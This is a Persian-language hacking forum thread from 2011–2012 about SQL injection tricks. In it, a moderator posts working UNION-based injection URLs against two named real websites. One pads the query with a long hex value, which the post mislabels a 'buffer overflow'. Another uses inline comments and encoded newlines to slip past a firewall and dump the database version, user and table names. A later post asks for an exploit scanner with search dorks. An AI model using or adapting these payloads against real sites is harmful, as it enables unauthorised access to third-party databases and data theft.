 |
06-28-2011, 11:17 AM
|
#31 |
|
مديريت بخش
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
|
استفاده از Buffer Overflow در Sql Injection
با سلام
به نکته جالبی در مورد استفاده از Buffer Overflow در Sql Injection برخوردم که گفتم برای دوستان بذارم. گاهی اوقات با زدن Injection برنامه خطای 500 میده برای نمونه لینک زیر که جواب نمیده: کد:
http://cleopatra-sy.com/index.php?content=more_product&id=-17+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6--+- کد:
http://cleopatra-sy.com/index.php?content=more_product&id=-17 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)+/*!union*/+select+1,concat_ws(0x7c,version(),database(),user()),3,4,5,6--+-  با تشکر |
|
|
| The Following 5 Users Say Thank You to firemaker For This Useful Post: | agent_12 (06-29-2011), Black7Hole (08-18-2011), good_boy (12-10-2011), homay (06-30-2011), __SENATOR__ (06-30-2011) |
|
06-29-2011, 12:00 PM
|
#32 | |
|
عضو جديد
تاریخ عضویت: Jan 2011
نوشته ها: 67
Thanks: 56
Thanked 44 Times in 27 Posts
 |
نقل قول:
سلام... کسی میتونه این رو یه خرده توضیح بده؟؟؟ من تاحالا به همچین چیزی بر نخوردم.... 
__________________
“ If I had eight hours to chop down a tree, I’d spend the first six of them sharpening my axe ” Abraham Lincoln
|
|
|
|
|
|
07-29-2011, 05:01 AM
|
#33 |
|
عضو جديد
تاریخ عضویت: Jul 2011
نوشته ها: 6
Thanks: 0
Thanked 0 Times in 0 Posts
|
I need a new XCXcodeXploit Scanner with the 2010 dorks in it.
|
|
|
|
|
10-01-2011, 12:13 AM
|
#35 |
|
عضو جديد
تاریخ عضویت: Sep 2011
نوشته ها: 1
Thanks: 0
Thanked 0 Times in 0 Posts
|
|
|
|
|
|
12-05-2011, 05:45 PM
|
#36 |
|
عضو جديد
تاریخ عضویت: Dec 2011
نوشته ها: 1
Thanks: 0
Thanked 0 Times in 0 Posts
|
من نمیتونم این کد را ببینم فقط
500 - Internt serverfel. Ett problem har uppstått med resursen som du söker efter, och därför går det inte att visa den. نمایش داده میشه |
|
|
|
|
03-10-2012, 10:27 AM
|
#37 |
|
مديريت بخش
تاریخ عضویت: Mar 2010
نوشته ها: 291
Thanks: 113
Thanked 493 Times in 211 Posts
|
روش Bypass
با سلام
در لینک زیر یه SQL Injection وجود داره که برای Bypass فایروال از /* .... !*/ و 0A% (به جای Enter) استفاده شده است. کد:
http://lin.bihac.org/index.php?details=-941%0Aunion%0Aselect%0A1,/*!concat%28/*!table_name*/%29,3,4,5%0Afrom%0A/*!information_schema*/./*!tables*/%0A/*!where*/%0Atable_schema=database%28%29+limit+0,1--  با تشکر |
|
|
|
 |
| برچسب ها |
| detection, mysql, oracle, sql injection, sql server, table, چک نمودن, ورودی, یافتن, گام به گام, آموزش, اینجکشن, اطلاعات, تارگت, ستون |
«
موضوع قبلی
|
موضوع بعدی
»
| ابزارهای موضوع | |
| نحوه نمایش | |
حالت خطی
|
|
اکنون ساعت 09:20 PM برپایه ساعت جهانی (GMT - گرینویچ) +4.5 می باشد.
